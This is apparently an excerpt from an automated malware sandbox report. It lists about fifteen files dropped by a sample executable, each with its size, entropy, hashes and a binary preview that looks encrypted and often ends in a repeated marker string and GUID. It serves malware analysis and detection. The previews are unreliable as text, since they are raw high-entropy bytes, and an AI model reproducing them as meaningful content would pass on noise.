              Preview:<?xmlU....E...T../..N..;...........,....v.~.=..lfK.....-.&Y>4^.....}...#..Xj.P.(...U.dY.v....UT..HRAj.a....f...f.0..(j4gkl.....x...,';..........@.........F..J...2N.Q6..Z.d...L ..........zA......m.....).Em.H..{z.u.`.Ox....}N.J......~......_ek..uA.QMj......).Ir..TZ.7'D.0.(b!.^ue~....Q7.g?..){.!.....]AM.;dI#g.5..{..l..|.4m..3.L......z...%.*../.........&.L3I.@..(..r*'j.\.^.4}..+i5.eod..30.&)O2.g...0.d.p.6.D....E....^.U.U.....S..T ..5....S.R.".~Rp.RX..5.Lex.`)..PewT.?..ZE.]?U.>............#6..<{...t.O.3..8D.......}..N.S.U......J...@J...+......&F=r...IOaF.>.DI..o$`Q.C[<.[\......!...k..$.f...g.....Y.z.3...[.:ezL2.*..J. ..Z..Gxg;Y........*..o6...M..v....*X.>.....,...2..\.,}K<.=......:...c.:clw.m...U0...........F6..NgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):630
              Entropy (8bit):7.640857217276723
              Encrypted:false
              SSDEEP:12:CyQXmQ9BS+dEFXKq0kJKU84+MKb65bfmMFFpoIuuedxa3cii9a:CVWQ9BS+dDwPTXbbfm28Ced+bD
              MD5:DBF646AFD58848E363AE9C4C72BC50EA
              SHA1:1857EAEB804901703C93692F6F86CAD7B580E4DB
              SHA-256:6B4776E250271E6CC8AA8E4639A706A366F791229EC7BB360256D3FAF74BFA3B
              SHA-512:BB61F63838B0D1C670B3A2A76376D40C6D9DD310CC07AC66898A4ED0D21852A474974B3CC9614D970855D4BA690697EF9F178B23ABA2F0731F383D4CE15438DA
              Malicious:false
              Preview:<?xmlj..wM..I<*..I...%.%.....N.`..%...0w'....e...R..l.2.N.,...Q.d..}.>I.Z.i.tp.4.[.Q= .|.7..#...M....G.Zy....S..................q.....h..Z../.Cm).1.....C.....g.S..@..vF..j..gO1.io..[E.r.:.7...V........O..C....`..6Vxf..Q..RnZ...-.G.M..O.3.,....*i.....#.U..V...m..a.*/l.?.fc......%..S.:...C.|..T..2..B.R...s.....M...{...z.d..R..7b.N.....YUD$..l......_V,q..*O..;....5).....X...*.sh.h.r...L.....6'..........|b.k.J...H.......>....c...BE./...i^.....Eo...6.q.'......p..'..{..I...Z.0f".4 6.U...]..M...iL...O...I.].~+z...dF....&..-..,sa~SgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):851
              Entropy (8bit):7.73778596229473
              Encrypted:false
              SSDEEP:24:Am5Uu7gbRZBtEYXrC4nAI6jRIUP6JAwX3d+bD:A9rn1m4AIQRIUkAet8D
              MD5:EAC89F4D34F2CDA4AA0B1E3C8E003E9C
              SHA1:421DA5FD8525697AF12E5540AAF12ECA3EB52CDB
              SHA-256:83144B13EC76C6F15025AC1AE1BA8D30E66F776C94CE243C01124D7F6004F308
              SHA-512:796E8DD53B4D2802F0C65F78CA5E1C8459A83B71AA067F1B3C64F01E57E30948DBD52D09305F298A72A288226D73E08FFA1E59414CB0719F1EA4B4EB4471B3D6
              Malicious:false
              Preview:<?xml.hj........;.+........)8).........3o..P..7I.A~U.O{%.40.a...t..e.'..H]V................nX..J$\..>;..\d.ED..$@cJ.~.>.....B.{.....I..'.."..Zp.HO...........5....\i/......[tK=..)..')./.D._.05....5........G.E..0..[53}.....n!..B...}?......N.&....q:H.9...Q`.......Gq<fnHGM..\.k...F;0..8.y..v`.C.H...Nh.SK.U.)7E..y.w.....7qX.=....H^.x.8.5'.3k~.....'....g.^...L..."N....:.?.2...a.%. ....qM.c.W5S......knAR^........j..h.hRL..m1.(....PJ.Tz..=...7.Q3T...........k[.w......F\...{N...+.N...TH5..{.f$..@(.....tuph.........?.g......z....X.....SG..?.....-3.l]!P.R_...?..^z.].b..W..._\....G....V.P....c....S..n1.b...Rh5.6Z<@~..j...vnw..o...u..&.T*-@ ...B....'N..C.%..c........)..65@N./;....D....1olq.b)..L.).R..3#.M<...j....r.U..N-...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):6314
              Entropy (8bit):7.969929467414341
              Encrypted:false
              SSDEEP:192:iZa7Xu2KDXAgo36Ei/KIx8OCUvGsV4AZnt:iZiYjAL36L/1TGS
              MD5:283F4B5FB5BBE1A48CD91D6337494807
              SHA1:EB612113AFA9F3CEA4AE4DD192EE39B729C4B4D4
              SHA-256:1EB8C7767186CD067DFAA89D97E8445AFABAD626C83FE17071EAE8165BD777CF
              SHA-512:121C91ABC90BBFF2F5C58A11CE8C7D57586483C93CB631C1F4465EE1813B3825816DE579A8DD895C470486B160E0A130BF967EFF7C9D86DF875202894E506BEB
              Malicious:false
              Preview:<?xml4..uj.'.e|....E. .;...*......=.$aE......ys"..N1Usgsz2Y......mo.D..S..,OI..\...hi`k{+'E..+,..... ..o.~.n..o....h.c^r....fL....9..^]..b.N.:....Fa|."../.H...iu.%..u..75..dAY.G.b./{7..g...y..P`.m ...`xX.M.m.....G.d...].....r.a.....b...".....vJ.$A.....l.Ia.0....-[....K..4...n..3.3.[.A..G0>G.+u..b...)..C....R?.........E.Gn.A]......3c.2.3....mdj6.......d.@....Z.._.y.kl....U......W...].G...:pO..l>r+S..w.W........&>.R.S....H>;....).W.e..<?b...%..,...~..CSi..q.zEX.{,'@.h..?...q"R..h......Y...M7g.#..@.....wa..FX.....6....t..z....M.EX.|.....35\....x.7~-.k.....gXz+....;M.I.a"4Z...S......;[.gc..D.Y..<.|q.`'..C.WP.5.../....dU[.I..W...D.5....J.^...}........y..6..N...V..5,._\.M.Z-)0+_..bN..r].a...*.'L5.#.C.,l.I../)z...`...e..=4A/.p.pv..+.B...R...V3.u..4......sX..7.X.#NW.u8D....@..b*?.@(..B;.4..4...(75...g..?y.[..e.......^.....R......7..%E.Q....}.........t.c..!..\.........>@...,x...u3...j...f...~([$.k..6..rNn.4K.9y..:%\....6.!o.*:.. ..=.O......
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1029
              Entropy (8bit):7.817335645084848
              Encrypted:false
              SSDEEP:24:YrpKN9hS1t8Z8pFSHXrlyI0Eyn0+QKHvH0fa3UwOwWd+bD:8Gy88pFEJ0E00+QODXI8D
              MD5:7F4390CF429DCB8B666518508848F664
              SHA1:A4B59F019E2E0C934869DA29F3D2544B7A7F11AD
              SHA-256:FB97C3076DB0F967663D41D3BC1A507C41BA88B92E2E0ED3E8CAB1F4FEB1E68C
              SHA-512:B74555DD07FDC9B738BB20242D8EEA1723E65B5E80B02C70211946115C7DB24E50B3602FCD4C010F353DA02ED69C83932735A0D516AA69F5EA1782C7E9E20E6B
              Malicious:false
              Preview:<?xml..IxQ...D.x.,.yR....?....I...=.$g........'.e9...D...W.._..H.D.l...}...{'|.J.9..P.......G.....v'..}..'+...9.].]..5.a:......4k..Fb..T.N.,...v.xJ\...h@d..P.....q...........AkO..&.).A1..nc.N....>7.7j..0p..8.W....................!...l.....?......e\..V@K..]..p..K.\R.9.....&..z...].A1....X.'.6...Y.>..{..t.n..P1....$I.,.k.q..Bf.uVSc.M.t'..+.0M.u..PH..'..K.Z..Z...2g....:.v.V...j.....n*..\.@...{.X.7..i..C...x.``....v:...|.Uk.N.....=...`M.j.T.....I........m.#.`.....&..`~R....$.%.gT.F0.s.4...H..l...r.moIV..,.....8..{p......PR$Y...%SNq..M?tT...6..(.k[.I.e..XS....V.Y!...25./_}...i.)..?c.'&\q{.....J.4...t.l.....H...Q.\..W.:.WX..n..............#P.S3.!.......y>z+;.*.....)......3.e...`..[UH.....e..HY.T..7. ......J,_..>m.t.3...........F...,..,ru.#..P3l.I.:-*...A..xT....O...)....i0.!..<.a%....x..I..qI.E.8.......Nv`."h";.2k(5.Im.V...4u....;.....4.f&1\.T7w......So.........U.h.].G.P..z.j.q..},...l..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1040
              Entropy (8bit):7.788585800809089
              Encrypted:false
              SSDEEP:24:Bdr4LybZ8LqHKvNtFPGcxWpwbMPxzseXxhTd+bD:BGy98LqHKFnPXxTMJzj/58D
              MD5:C7C01CD3DEE5BEAF3F4C0B7E562A07DF
              SHA1:36CBBC75F776F3EA5504C3DFA9FF303D7AE22033
              SHA-256:30482466AD69E990E0DFE2D1D2020EE59FE14589B5F1CBAFAB01E1EA6C64098B
              SHA-512:6AF259001EC0EF6E404B91145E6676DB3AB180D8E4161660F2DAD25B88D45C1CACF13D2322C5EC11586EB4033445A64AC2B9AA5D46C6E18550E8AB5E574ED427
              Malicious:false
              Preview:<?xml..rj.=.y'~.V....F...n..Z....H0X.._b..@.`...L.G.>G......,.|+...zf.,C....&....h..#.....'q....s.c.xc.......;..xl..x.Y.pK..i..g{._N...u.Yeu...x.3}i.?v.5bwmP.Inn....T..4s...?.....i...!..<I....3.tm]....(}u....I......q.9.....e.LZ.S.3......z.=.=...............:....f<p.\..M...B_z{S...h!.l....[V.d|.X...VG>..t9...Ho....]...!.h.Dsp..H.-1.$..z...LbSmf..../ep..<.i-g.hfAH.P.T......U....~y...H......"#9'......W.w.......[.}R.....@8rr...."q}S`...C..^..V....d.7.g......VLV.....V...K...u.N...o.........e..*><.....>j;....]......~+.<..qB+...ho...{....Dh.n...y.v...%~.....'B.F..6.q..NG.C.9B...u..l"......k^^I.a...f...7WI.ri........j.l..[.^..N....o?o.9o..N...:...2..t....?....I.A.j....0>.dsY..;.}..|....~W....\.1...W5V/.`.Q?r..3;.. .f.....h[.<.o;S..B.(`...G.%...L.A.!...w}.B..U....".o..s...(@..;............;a.r.$...].x..p...c..;~....tK.eZ/y.Ct.6.Cc..^.F5.....q.. ...<.h....!.@....A..3.t..._H.Dp....w].o.r$-.+?[}.....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJ
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1415
              Entropy (8bit):7.845940317302979
              Encrypted:false
              SSDEEP:24:asWmeuCTBfD2g9Nbw0nWtFi5zH4DtEamg0lfC9H7Je5g+jvwmdd+bD:a0euCT9S4NZsiF4DtE2cYP+f8D
              MD5:F4F48685E6E200EC7505E4B2736AA7E6
              SHA1:5C05B5EB6B9BA05454AB524D1E8BC2D0080FCB9C
              SHA-256:75A1BC1BE22069CF050067300BD2E65FE1F217E4BFDA939C7CDFDE18EDB04F28
              SHA-512:5A5D78871894B20EF99F0031708F56C8F62E5F4EF56192FA22028CEC408629ABB466E44269104E788C0750954FD84781A9DF08E8C8C5FEE73622CFFB07AE7683
              Malicious:false
              Preview:<?xml.......?_.oh..L...q.o...c..^.-.......n.wfE.....3C..v.'...|.E.n.g&...,;egj4....s.S..Ar.C.B..RC...4.2Q...6....o{....{....&b,|....#..Z.c(..F..k..`.{D.{?c....h............!.<h..[X..U....7A.*..n....:.G....D.A=.:.(.9.AW.Q....\.p.>2..t...8..j.i..A.iIl}.0\+\qVgj(.3.*6*M#Y*r..]...g.Ug.$a.z9.d...11.!.J.y.2XH1..4l.o..l..|.l.3.e.......N..A...bf.h~...(R.~.V.&B...R......d;....6.$n..gmD........k...f,..R.kkw...39pS!.o..pz..e\8....1...@..oY.)6.U..6g.._..Q.s...Xv"...~.vI...8.;.0....h....=...o~X .l...Se..<.0..#.,...~I..6.s.....q:v.1....|....q...9..(..kufZ...03............p...W...3..d....I......D..(1..Ia.h`.E=..l.F.....G...w......fOs..S2[..}..|.yE@..;..4u.W..Q%.....j`.c..\...V...-.\X.%....U16T.I.........w....W1.....-R...J]d..........o....F......hY@R........M..Z.{.?.\.....c4........w..{}.t...8%.mS.\%}&t..=.m..`Q....#."....u...~.+O..l...~G......FU....P[N.../.)...x.}.....w.I..,,.....(V.T."...%.O.}..7......_c..yg]..M..8.Y..#..F".b1..EE...~.o.d......u..;x.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1073
              Entropy (8bit):7.7972489047024585
              Encrypted:false
              SSDEEP:24:IEful990k854y4gu+oG2XGcMEZJo4pFnH+ADDhF+7ed+bD:6l9A6y4gu+45MOJfjDDhF+s8D
              MD5:4EFA2E4443E9031ED4A034D53378BC31
              SHA1:606BA3E37526F75E58B2FA061A1873BFC70345F2
              SHA-256:30F573423B7B0B9C8B6FDA0E17E88CE6480FC27AC6A32977720E2A234B2B4D33
              SHA-512:0001D1B74CFA462BB2DC8538237C8B42B7A6C19C96F5D9D2C743BF065B2D0CE8AE0446490458499785ECB31C174E05CAEB5D410E21E7D982378FD231B84CFADF
              Malicious:false
              Preview:<?xmlu.5m.Y.._.......].(?..7a.C..e..)1!....F...UmUH..zR[E.s.U.:D6.<f.%.j....=={...{..H...g...(...Aj..4{:../ZH...=lg....M^.'..jReA....o|.o.ri.....2R..x....<...SuM.....Y.[..+@.v@D.#8l..F.0.....&..`.,9i..[.0n.e.BU...gA3.%...\.4S.].6.rs.z......(&;.3...W...G.=p..}..Si..U..TF..k.p.q..#.R..zQ..2o......SL..?.....D.&U.x.S..N&G.S...6]iS.B.{..~....R..8@...q.r..<.A.......(~5.xYw.6~.$(.:.CK.C.A..z.L.)g..G..B.w.X0..x>.[W. ....c.z........<.t.?.lK..j...M.../.r.:.....<..F..wn.>.....`..........A...._;_..+&..p...V.&W........7..;i.V+.5<K.@......h$.%..K.4K....^......Q...$.^L...W..\6Z..T...T...1z.BtNbLvV.+9..Mu.Se..jP..#.....,z...SsJ1(B...v.G.&.*.^.a.zv.S.,...z_..9.hh.......}.oq....W..P-.Jz4t...y..}T.A@tC.s.*.kp...........).#{+J........}...v.....z.?*.~...g.).8..y.9.,.>.Z.O.hO.TPn.j....,E.......m....r....X..g.d"X.]......d.Zs(.w.v..9...6.Lz.X.At...2..p.W.'.....6l'Wv..}.g.4|..=.'p......*b"P.'Y..QNL..3xU.k.....A.4..W..D.H>.b..S....d.`..p.B.....8.s........g_xgigF2
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1154
              Entropy (8bit):7.813227455057131
              Encrypted:false
              SSDEEP:24:Foo7zfL+/VjLPLLWX+11sDnbxT/smF8VMoONQzAdiiQKakgHed+bD:F9jiJLr11sD5/smF8ioIMAEiMkgw8D
              MD5:CA4362ADCF6BCA05745ADFC69A1290AD
              SHA1:5DBDCB6650FBB3829A22D5F9AE06AEE5A6B6DFFD
              SHA-256:961592D98F46CE6814BDE5B044FA5D7E197E835C204907E7EA02CC48DD52B9DA
              SHA-512:583E2D4889E634CB4D312FA2987EA3B127F8AD05FDEEEF8BD83333A532C702FA58D913300FE6D02AAD0DCA5C7554CCC131A923688786A7CD203285CA0A94868E
              Malicious:false
              Preview:<?xml.^;.X...c0.y...AXq....jl.X..i.....~C....LOu.8.[g.T}.zT..3..<.7/c6OI.-h...S.F.(bR-)....R.~...,..|.<'!D...., ..Y....c{..".......^.=.F,.."i..R..D..b<0..$.:..cc..XU%.(....G.....zEP.uu..38o>...B...0..]i4Yaa]H.V.z."'%..h.c.G.........b.v....uT..@.qS&s.'...%...&....i..........".hfL.....qa 2.hC....N.}.2.....4.4.).._Im.L.rj.hN.n..n.._..X.T...9.BBG|....Vp..B2.Hx..BT..Eq....i.9.*.w...?...T.'#&....).ZG...7.7...m.M..x#.j.=G...En.&....^P...a.l....C%....G.r..Je....|.r....L..S....mA..;....Hk5i ...\YB...A..@....oCC..8e.......WT...d.B..?>A...1g*.>......6(c.x6=..s=G..zE~..;....^....lv.5.%Tu...Ba.5...,[..%-.1l.w.-..D#........s].9..~...S*.._htk..1.....R..v.x..H...mz.T..I._..m..+...>H...3..A..(%.....m...C...|...q0W.U...t........s" ......QGVQ.V.$P..=Z...6p...m.H..........S.F..A.jr.(...R......7./r[A.._..@#T..j.0.....6..<R..J...pe.R..X.'..w..S*F?>cfS....$.z......fTH.....>+.`....]. K....)._.k0....g....1.\.l.VT.~v.3o-....j.......J....]E.i.`.v.+h.%B>!...e.A.d...&8..5.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1902
              Entropy (8bit):7.915297832758203
              Encrypted:false
              SSDEEP:48:2WRgn+sFDG2GkQhhP20j9BOL7t38xnzGX8D:2pbDG2ahhrEnt385h
              MD5:0D1C756A30B53EB873A95FCCB68C8E9B
              SHA1:DB3DE6141F2229F4531098E2AB0D9A6FCCF4E8CA
              SHA-256:9D3AEDD1088CF3BAF46FDA6E8175731314BC1E64F0522758C78FC0100C2D3A79
              SHA-512:B033A97D22378F6379A184EE914A7BF7F5EDEECBC1E9E588F5C886CA6C0953F2AB0301F44296DB5089D38F9BFA22F2E1EC9589F296F7A3339046C2031A6BF346
              Malicious:false
              Preview:<?xml.B....?......C!6..*^.(..gi|....+]...V..C..............E&..@.{{_.i..z.s.5.L3../.!;..p*.@.b.s1..0.:.f....C..Q..S./..p........Hp..Dy.J.2s.V:.\n#..\2....~....<..1.[jF.s.t...W&em...t...u%".Dk.j.%OL..4......pD..S........'z9..EV...O5m.v$2........s1....?.J....{......"d..i..4.|.;.z.IL....n..o...p.v.\l.y.`.....S.ZA...6..5..W..z....c=..d.d.l.....H....._..+lI.Vy.i.U..O2....v.\>.. ...?...xB`#"..x.M....<.FM...s%.~..f.n..V^S..P.......MV..&.}:.....[i.uX.FqM.M..<".P./.4..C..........2:...../...Dn737...x........k.......="y.....hl..E*.25...(R...U|l.......Z...S......Q..w_.$a.'./.pO.#G....4E.......*.[.1.[..d.f.....T..G.xm.t.........9t..:.W...1.....Q..q.,...A..i.^..Ri.}....M...>HW-.l..6...Hke...{....+/GI.u..}...2RQ4....X.,..)=\..CP....v..../...G..l..{s.$E...H.2.D?...s3.fw...'n.@..3(6... ...w....I..v.5.X;(V<.*...6...`7.+_X..e...>Fo9..T>.|.ho...P..B..WYH.J..e?.\......;..0We..u.m]U-.nn.+....x......&......A/J...s-NX.0....<.....B<..4...|.".a'.T....3.Txe...8h
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):712
              Entropy (8bit):7.6778729107516615
              Encrypted:false
              SSDEEP:12:c3L8vn+vgq8meUKvWq4FSTk+BJ+2dyE1cLberHK9TbdKj7Db0SFZm1DU+sLdxa3X:Pn+vU0OQQybPeKda7/jbmZU+6d+bD
              MD5:40BEDA13ED7E552D15142A0740047A64
              SHA1:DDE44F320031C2FD3FF2EA0AD8715474C7104079
              SHA-256:D9243DCA0ED4E51E20ECD8982E35D814EA95D2B6D7C3CC463D0066F931A850C2
              SHA-512:90A2B5B489FDAE622CD8328A8BEC3A7C7EC0CEC9256BE8B5EE631345EA1C5DB2C5DDC458729B00100057411C742D9D3F501C2E883BF6178B9616A9ED63F415B5
              Malicious:false
              Preview:<?xml!.Ca..h.m/..K.!q..u.FBdS......C..f..>.....u...hWmn..\M.E....6...m..8*.h.....b..s.............".$....G/.t..4.[}......\... {............q:.k...R....P....^K.k.../..s=\..v..,..;ZN...yEc..j,.2.pm?Lh..0...W....../sM59....)l....W.Q~.*.z.;<.e.Y..^.%....s?.;.}8....0S.A.?4*...d....?.|p.RH...!.\..6....$..p....(....a.......Z.......#..Vez.........j..m..0.......'6............1\R.V...Oi.^...$..3[.<..u}.Iq.D.aY.l....O...n..X..^..l5fX2....T)..F....X...G.+o...,.&.....((I.o...lI.$..S....y.`1..I..4v.......10...Lh...H....<StX.Yq.VN.y.....u.......jF.<........d.....L...DvT.D.w....~{.{.....F|%...}."..(...q.....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1707
              Entropy (8bit):7.878042503599263
              Encrypted:false
              SSDEEP:48:jgM+Qef0HnQ1m72YFxuQucDXpO3AFWYnt08D:0cnr2EDX43A9p
              MD5:4BAB1005E717B253A81428222E2F8155
              SHA1:C833298F1C89DFBE45A49B1C79C1ECEC55C6A166
              SHA-256:33E418954C8AAB11E87EA57A87CAF67B5C817E357EF7898B3D6905D6BD4FBFF6
              SHA-512:F2EA1F3D5422D749C54EFC84AEEBE7B711AC82B8539CD84E3F09D99CDF9E9B6E3C1448FB6159B0B55B9A95B895033C9BC595CAD719F5B8CF06B18F86D8D90913
              Malicious:false
              Preview:<?xml.}2.J....i..y.<X....F..v..U.g.._.".7..._..y.4_.....4y....Y?^.....%..5Z0.?..?Q.1.3.%,p.VXjepBv..g..tu...uD.....9..M...9.H.d.r$b.b-...._........R...i}.....:`..OGd...i..H.r<".?.l..1#..h..;..5.pM....:.F.}}..{8L).c.U.^...0.d.aH.3h...WP..b..rSQ.#.....M..J._ ....`.A..A.*...QZ?.....B.^.....2.N.z5.>.NB[...}.'.@)._..V.p.....R..&B".jY.....Ij...y.o.7....C..v.0(.....-O......G...t...<5....m.G.f.H......,j.Z.+.....1...i.(..1.."..h......1..n...;8...].}..b..u...(....6...|....=....m....p.C.9..[u....`s8H..A.....c.8*.6...L...O.`.=2./..#......o)..S...I..*......@.|...%..p-.....L:.,.Q...<......J?v_............;..Si.ji.W...A..J....Y.}d...b/.u-..W.A..4......A{.0-..XhP..;u?.VN.mn"....a\.o8.>)bO.y..'a.xI..*..X.Q.D.I...i..z$.~T.....:..Y.5.s.......m.M...o.2g..Y.'.....~.B...S~.#...V..^.p...L.".)....OyU.G.|...4%.M.uBQ.U.7.....Bdx.n..V|bz.Z..........n]e...e..p...QR..=f..8*.K..5.@Z.k..T.R.u,..=.=..8...4U...>^....g....)..H..0(<......J..V`?.s.3+.f.C......ew..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2111
              Entropy (8bit):7.915556823753741
              Encrypted:false
              SSDEEP:48:5u+8MontIX0qmBxaa2ZmKvhiKVTlSj51jRzkrChL8D:5YMotIEqmBAmKvhNSNmz
              MD5:385EA4B9AFD402F5D32801C22F76BBD5
              SHA1:50208F5F46114F4BC68AAF2966CF9870A00E3ACE
              SHA-256:95E27007965397B90288194758A98304A1B3E5F45A5D6B2F35F7C8BAFB3F9B70
              SHA-512:0DCC0CE533407910814BAB038203CCE68AAEC691E29B0033DA31E52C5A9D275DFD01003D7646B5406D65C2440152303A6B190F1D68B4FA6C81A05726CA3921C1
              Malicious:false
              Preview:<?xml.9.U..D..).9..o.[-.O...;..WF.....;.........}n.....L...~..Z0.0.h..{....Q.N?|.`.v.U..E.+..F...R...}...M..P..$...!.Z...w.T.Z...h;.DD...........*...\........G.+.P=+W....N....O.vi...X.J2.,..~.......`h+..3....U".%.....A.pBf.W..I....Q...7j=V6-.<.......u..s.y=&..1..mkY.<.`#.&..aZ..~.......!.....-...Q......p....K.C.vV.H4..!.........V...P.}.^.Bn-[. ....9.5..D..Z..U.x.P..Ots..A!........53.....n.i.lw...y..6X...Kc......W.+..M....*.....tD..v.dy9H..[..d.h.F.....:o. ....F...E.n..3y..Un.pP.....(.8`.o$./.[2.;s7T.{...h.Gp.r\..;E..G/.!v..m*...m.g..d jG.R,.zj.....1....Y..E[.F....M...A.^..Sl.Vy.....\...V.V.pc.<.0...c.....{Q>..Z..^.f..C..`'.LV.a..N`...:../.'(....+.......I...,..`.P.?..V.\"!......Y`..86..Y....L..t&.xP..B..~:R.y...K..\-.]...l...7......).`..h}.$.].l.[z....*.e.....0h"!...8z..0T.].:.F?9'.?..>.r....^%.....s.!.nn/....&.7.....cK.S...g.y>T....6%@).Z]......N.........1p._.k...Ch..?...$-......JzE.Q../.+..,..a.LE......6. Rn...z...;..?...%.5l.3..[w....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.894116625206765
              Encrypted:false
              SSDEEP:48:gn1OsGyBVnxJQOdvhgup8jihNqrJqRcbt8D:gnMZyBt1hejihsNCF
              MD5:8A24D8E4172E83E70B5D4730D99A95DC
              SHA1:8C0170157087C6958482CEFBF3B6D6A63EB58449
              SHA-256:E2BDCBD60589B8F07C2DD28E8F8D7D9ED4ED23D01DF4D7F0777D2522E574ABA7
              SHA-512:B573C68AE711FB0740741B0C21F2C3ED4DE8CBF6C78E080B85AED80FC943BF877AB6854E6985901484EBCF3B071D58ACCEB79080A0C20CC2792FB6F85309EC5E
              Malicious:false
              Preview:<?xml:'....Av[..W.0.gK...Z.]...37..jZ'...*.S..._AUY...M...*.;.:......{..%.LmD_D.~U...............[....Z]b...L..t.W.F%.....l..).......5..2.......d\oH1[j......Y^.....RF.....L.V.K...k5..ex........s..y1^*....8.....\...4...!...V..]........P...........}.EF.7P.t.1..7?.j..g..X.....u$..h`....P../e#..zh..[,ce.....0.r....?.....H+/J.....;.N,..~_AU^..o......o....y.,......Q]..)m.D6.e.............7...*..=.ldn33.,[...x....V%m...dqP..../%.........@.E.o..p.d.uqd.vA....>8......*.\i.?....s>\..?F.e4......6.o..e...'%B4...Bsc..C..3..,.@....g(..hL|...~K0.....1..kk.=....}..6.....:).LxSm.....6..Z.S\.G...`:..C...eC.....5k..w..'I<_7. ..V.....*..`q}........<.M3..}..+(..L|.p..q2....L.S...R....k...Yo..T.&.q.q.Z....n.-.G.Y2..kNN.f......eF.]'..n..m..}S....1Gw.V.q.4Q.b.........M..z..........5..Pj...gEz~..~.Q.z.L3..~o.^-a..7T..4f.E....m..O:.hk'GZ{n.Rb..jL..wYS..p..,...._U...5i..Q.Z......e.....D.A..`...y.Mi.!_.p{.%....P......aR....I..W.'.. ........auI%.r..>..B;MO.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):935
              Entropy (8bit):7.775426276808336
              Encrypted:false
              SSDEEP:12:5BG90Io8ruTnk5B5zikdt+BV04tmeICQhtDWHOoSsWYpSLVi3fM9VfIFujRD8KHW:5BMKnkDJ3t+304t8C2UQRp9VwU8Sd+bD
              MD5:4D2DB3258030BAACA11D16CAE546B5CD
              SHA1:ED6AFB994026A0E923A7B37802C7BF03120A5A07
              SHA-256:D2D88BA4509D228C3E18B752A0451BE736D0B497C3D84822CBB3EDE224DBFF4E
              SHA-512:A8D05D4387B48923AB597F65F86A18EDEB160F1796F9A22F21AC81899C85DB37E3452587C1EDE1530266D7F60F2AEF48655F429AF81F358B1D30B2024B41E716
              Malicious:false
              Preview:<?xml.b...^...-G.n......s..0N...?.\.._5.w.QA5k.D...H.f.C..-qk..)).S.d..Z.....|.X\.....(.....uJPf-.MK.1.0(.....|...z..]e.[F5q.\...5EWFg.x{V....A.M...QG.."....ws`w....*.I..5.7.l..y).,TgV...0-...+..K.E.H.[4+.B3...8...........(n.0.g..4...}....%H....H/.....s=~....s].)....7#.i..XV.Rmv..~.u.......".`....?...........QmH....}...V......8....7..[9.....Y.+3~8.u..."B.\'.:..jH6..ZF..H.;....Y.....x.......:..0.6s~.yRl....j......rY`.....&..V^..;eE..v.....7.....F].8.6.Gq..n.\.aB..Zw..SDc&+.).foL....g.......G{.k.{...f.^T$M(92W$z.`....f._.....O...0d.}.Mc./.....U`...=.....u?......y.K........:c..'.>.u3.G... r....EB..`..o...._.v.\<..W...ng`1_^...0..1..O.V.O.....S;eC..B.:...|.........t..4.O:i.T.bk4.N....0(...2..M.;.i....Y..(...S.....GTv.R..b./..<..:=QN.UTI..._q.vc.....2k....:'*.F..89..d....>..0..>.?..RFK.15.2m.5#..1. ......gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):980
              Entropy (8bit):7.807801245332445
              Encrypted:false
              SSDEEP:24:s/vqQBw4JOdP237sd2LxoPMbthwTX3x5h0rEKv62Hxctd+bD:svJvsAPbthwTX3xjlSa8D
              MD5:2420C9C93BCF7F5D2E1BE343FF56FA9E
              SHA1:C206F458699035A8F15649A7E5814BBDCE0A4AD2
              SHA-256:2C17FBA4226C77C615F91623B02BA3AD5D3347BC99A2625BDEDF6BA268512B78
              SHA-512:B3BE172351E9D33B275424E47280C19E20A7E32794AB363021F3A1081F5140400B1BABA2EA48C4205E7B4D411633E20C8DD108C27BFAC275661891C20146727C
              Malicious:false
